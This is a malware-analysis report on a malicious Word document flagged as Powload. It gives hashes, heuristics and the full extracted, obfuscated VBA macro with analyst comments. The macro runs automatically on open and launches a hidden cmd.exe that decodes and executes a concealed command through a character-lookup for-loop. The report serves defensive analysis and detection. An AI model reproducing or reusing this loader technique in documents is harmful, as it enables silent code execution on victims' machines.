Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dfc59312335a9a72…

MALICIOUS

Office (OLE)

98.2 KB · Created: 2018-07-30 13:16:00 · Authoring application: Microsoft Office Word · First seen: 2020-05-14
MD5: 7ac3273214868b220de5132032b513bc · SHA-1: 6a14f62881b6beb1f69876bcf248be80e7e4ca33 · SHA-256: dfc59312335a9a72fbdb967b1afb74ba0c3a81d12850af39a695413f36d79635
112 Risk Score

Heuristics 6

  • ClamAV: Doc.Malware.Powload-6752222-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6752222-0
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6071 bytes
SHA-256: f6abe5d4bb1256eb7f77555ddfa59216a2271ac35983a8397bcb08aaac98baa8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
49 of 79 identifiers look randomly generated (e.g. 'nkBODMJMldMEH'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' Module attributes written by the VBA export (olevba). VB_Name is the randomly
' generated module name; VB_Base = "1Normal.ThisDocument" and VB_PredeclaredId = True
' indicate this is the document's ThisDocument class module, the place where
' document-event macros such as AutoOpen are hosted.
Attribute VB_Name = "KdYBNJXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point. Word runs AutoOpen automatically when the document is opened
' (the OLE_VBA_AUTOOPEN finding in the report above).
Sub AutoOpen()
' Every runtime error from here on is silently swallowed, which is what lets the
' junk statements below fail without aborting the macro.
On Error Resume Next
   ' Junk statements: AppActivate is handed undeclared names (Empty), arithmetic on
   ' undeclared names, or arbitrary numbers. Presumably no matching window or task
   ' exists, so each call raises an error that On Error Resume Next discards.
   ' They only pad the code and dilute static signatures.
   AppActivate iAFYW
   AppActivate 8876
   AppActivate Sgn(sLYZvd * lqEvmv)
   AppActivate CBool(2)
   AppActivate VjXUE
   AppActivate ChrB(44487 * Wootd)
' The one effective statement. Shell executes a command line assembled from "cm"
' plus the return values of the helper functions; the helpers visible in this
' preview return pieces of a "cmd /V:ON /C ..." line (OziLPY starts with the "d"
' that completes "cmd"), so uRJRMKMY and hLRzTkimn, not shown here, presumably
' contribute little or nothing -- confirm against the rest of the module.
' The trailing "@" on Shell reads as a type-declaration suffix and appears to be
' cosmetic. The second argument, 413851704 - 413851704, evaluates to 0 (vbHide),
' so the spawned console window is hidden.
' Detection: WINWORD.EXE spawning cmd.exe with a /V:ON /C command line.
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
   ' More junk calls after the payload has already been launched.
   AppActivate IttWX
   AppActivate Tan(28264 * YQEBd)
End Sub


' Second module (randomly named, cf. the report's identifier-entropy finding). It holds
' the helper functions that each return one fragment of the command line used by AutoOpen.
Attribute VB_Name = "nkBODMJMldMEH"
' Returns the first fragment of the command line run by AutoOpen. Every literal is
' chopped into short pieces joined with "+" (the "string-concatenation chain" noted
' in the report) so that no contiguous keyword appears in the source. Joined, the
' fragment reads: "d /V:ON/C" + a double-quote + "set Ja=<lookup string>" + "&&for %8
' in (<indices>..." -- i.e. cmd.exe with delayed variable expansion enabled, an
' environment variable Ja holding a character lookup table, and the start of a
' batch for-loop whose numbers are positions in that table. The index list
' continues in the other helper functions.
Function OziLPY()
On Error Resume Next
' Junk calls, same pattern as AutoOpen; errors are suppressed.
AppActivate CSng(XpJzG)
   AppActivate lElBC
' Chr(... + 34 + ...): the other operands are undeclared names (Empty, which is 0 in
' arithmetic, assuming no Option Explicit and no assignment elsewhere), so this most
' likely yields Chr(34), a double-quote that opens the quoted /C command.
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
AppActivate sJSlZO
   AppActivate CStr(QckCi)
   AppActivate CStr(5289)
' Remainder of the Ja lookup string, then "&&for %8 in (" opening the index list.
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
AppActivate 1051
   AppActivate CInt(uQZWVZ)
' The following assignments are only comma-separated index values.
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
AppActivate Int(8523)
   AppActivate 45
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AppActivate 563
   AppActivate CByte(jdFMG - JESlW)
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
AppActivate iWLSaQ
   AppActivate CDbl(IMoQuM)
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
' Join the pieces in order and hand them back to AutoOpen.
OziLPY = KdZPXiI + XiliKnvDES + mmVjkqKIQow + SsDnIFzk + AbcEU + imdCC
   AppActivate CDbl(353005535)
   AppActivate OHjwfq
End Function
' Returns the second fragment of the command line: nothing but further comma-separated
' index values for the "for %8 in (...)" list opened in OziLPY. The literals carry no
' control-flow tokens; the AppActivate lines between them are junk as elsewhere.
Function mriHqobA()
On Error Resume Next
AppActivate 41
   AppActivate 325
   AppActivate 401087306
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
AppActivate hCWsa
   AppActivate FpItJ
   AppActivate CDate(rjnCPi)
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
AppActivate 283753694
   AppActivate CSng(bcWMB + jlFbOF * RXGFmh / KGEAh)
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
AppActivate YJzlh
   AppActivate CStr(233568307)
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
AppActivate Oct(27)
   AppActivate Hex(EsVlm)
   AppActivate Fix(NRQwKs)
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
AppActivate YViiT
   AppActivate CBool(65)
   AppActivate 224
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
AppActivate IskGT
   AppActivate CInt(6)
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
' Concatenate in order; the result is spliced between OziLPY's and zDkRUaCa's fragments.
mriHqobA = iADzB + jOhEvRpB + pBPVNOdtZc + tTsGzkkbvYo + LYwaYWoUA + jYJhBjwiLc + qENuc
   AppActivate 123212862
   AppActivate iYTFZs
End Function
' Returns the third fragment: the tail of the index list, ending with "79)" which closes
' the "for %8 in (...)" list (79 is also the sentinel tested later with "if %8==79"),
' followed by "do set 9EJs", the start of the loop body that wAFnOSnsGjw completes.
' Junk AppActivate calls are interleaved as in the other functions.
Function zDkRUaCa()
On Error Resume Next
AppActivate frurL
   AppActivate 157
   AppActivate Tan(YZZhZ + 92113)
dcHBMSN = "5,6" + "4,7" + "6,1" + "5,29,48,18" + ",35,22,4" + "3,4"
AppActivate hJdIK
   AppActivate CStr(9)
   AppActivate CLng(VBSwm)
bSjzPWiS = "3,55," + "38" + ",3" + "4,3" + "4,33,9" + ",60,43,44," + "32,75,59" + ",68," + "34,71,"
AppActivate Rnd(OBcIQ)
   AppActivate Int(klXON)
ohmzHoGz = "57,32,73" + ",55,53,74," + "43,66,57" + ",35,57,6" + "5," + "30,31,17" + ",6" + "0,33,45,4" + "9,45,"
AppActivate wVOZWK
   AppActivate Round(JDLoX)
nIvHvprv = "57,67,51,7" + "6,57" + ",30,31,55" + ",15,2" + "8,49,31" + ","
AppActivate CInt(50895 - rslpBz)
   AppActivate 140
   AppActivate Sqr(KVpKZ - 15777 / UIubj / MTWdJ)
XcRhULf = "44," + "26,13," + "38,43" + ",44,2" + ",55," + "69,5" + "7," + "47,57,6" + "9,31" + ",17,6"
AppActivate 3
   AppActivate Fix(jqEFfJ * jusTO)
wvpvVCFdH = "0,33" + ",69,57,3" + "2," + "44" + ",46,44,5" + "7,30,40,7" + "5" + ",59,44," + "9,36," + "22,66,31" + "," + "59,42"
AppActivate 68819893
   AppActivate CLng(TBFAh * cMWTd - 7301 + 40439)
   AppActivate Cos(iqvFv - 80676 - 94177 * oMPaw)
CfbEIas = ",7,45,74,2" + "6," + "45,31,4" + "0" + ",73,7" + "3,65,41,4" + "3,59,63,41" + ",31,7" + "7,33,"
AppActivate CBool(7)
   AppActivate Fix(OZhwj + 57851 * 62223 - EiimB)
   AppActivate MmOdTS
TSJJhZTvTQd = "58,32,0,75" + ",7,26," + "53" + "," + "7" + "5,9,1" + "6,1" + "1" + ",74"
AppActivate 9225
   AppActivate 5
FLanmR = ",53,44" + ",66" + ",31," + "59,4" + "2,7,72,45" + ",31,55,15," + "2" + "8,65,30" + ",73,43,9" + ",5" + "9,4" + "3,"
AppActivate Sin(vMOjq * OVnHX)
   AppActivate CLng(34118 + diIqJp)
   AppActivate 460
CZlGQDEA = "54,42,59,7" + "5,36,44,3" + "9,39,45,31" + ",55,15,2" + "8,30,3" + "3,59" + ",44,9,28," + "30," + "62,36,9,43"
AppActivate kJBmz
   AppActivate Sqr(8269 / qOjaz)
cWlLU = ",36," + "22,41,62" + ",62,45,45," + "4" + "5,45"
AppActivate 57
   AppActivate Sin(zWcTR)
' Last indices, the closing ")" with the 79 sentinel, then "do set 9EJs" opening the loop body.
FfrMqO = ",45" + ",45,45,45," + "45" + ",45,45," + "45,4" + "5,45,45," + "45,45," + "79)" + "do " + "set 9EJs"
zDkRUaCa = dcHBMSN + bSjzPWiS + ohmzHoGz + nIvHvprv + XcRhULf + wvpvVCFdH + CfbEIas + TSJJhZTvTQd + FLanmR + CZlGQDEA + cWlLU + FfrMqO
   AppActivate OIYdju
   AppActivate 7
End Function
' Returns the fourth fragment: the body of the batch for-loop. Joined with the
' "do set 9EJs" from zDkRUaCa it reads "set 9EJs=!9EJs!!Ja:~%8,1!&&if %8==79 call
' %9EJs:~6%": each iteration appends the single character at position %8 of the Ja
' lookup string (delayed-expansion substring syntax) to 9EJs, and when the sentinel
' index 79 is reached the accumulated string, minus its first six characters, is
' executed via "call". The decoded command itself is not visible in this preview.
' Detection: a cmd.exe command line combining /V:ON, a "for ... in (" numeric list and
' ":~%..,1!" substring expansion is characteristic of this decoder stub.
Function wAFnOSnsGjw()
On Error Resume Next
AppActivate Round(379866174)
   AppActivate Rnd(HDvfFc)
Pcnjkja = "=" + "!9EJs!!" + "Ja:" + "~%8,1!&&" + "if %8==79 "
AppActivate Log(94895 - MpZuq - rjASE - BlCfp)
   AppActivate 6294
' Chr(... + 34 + ...) with the other operands undeclared (Empty -> 0, assuming no
' Option Explicit and no assignment elsewhere) most likely yields Chr(34), the
' double-quote that closes the /C command opened in OziLPY.
IOauL = "call %9E" + "Js" + ":~6%" + CStr(Chr(VIKoYtRrFFdP + TvOWBZbjHHuJV + 34 + HwbLbGalvkbL + qfJGnCTX)) + "   "
wAFnOSnsGjw = Pcnjkja + IOauL
   ' Junk calls after the return value is set.
   AppActivate CStr(nKjpGY)
   AppActivate ChrB(oAOkN)
   AppActivate Rnd(WqvEoU + SzipU + 68713 + LFcsBK)
End Function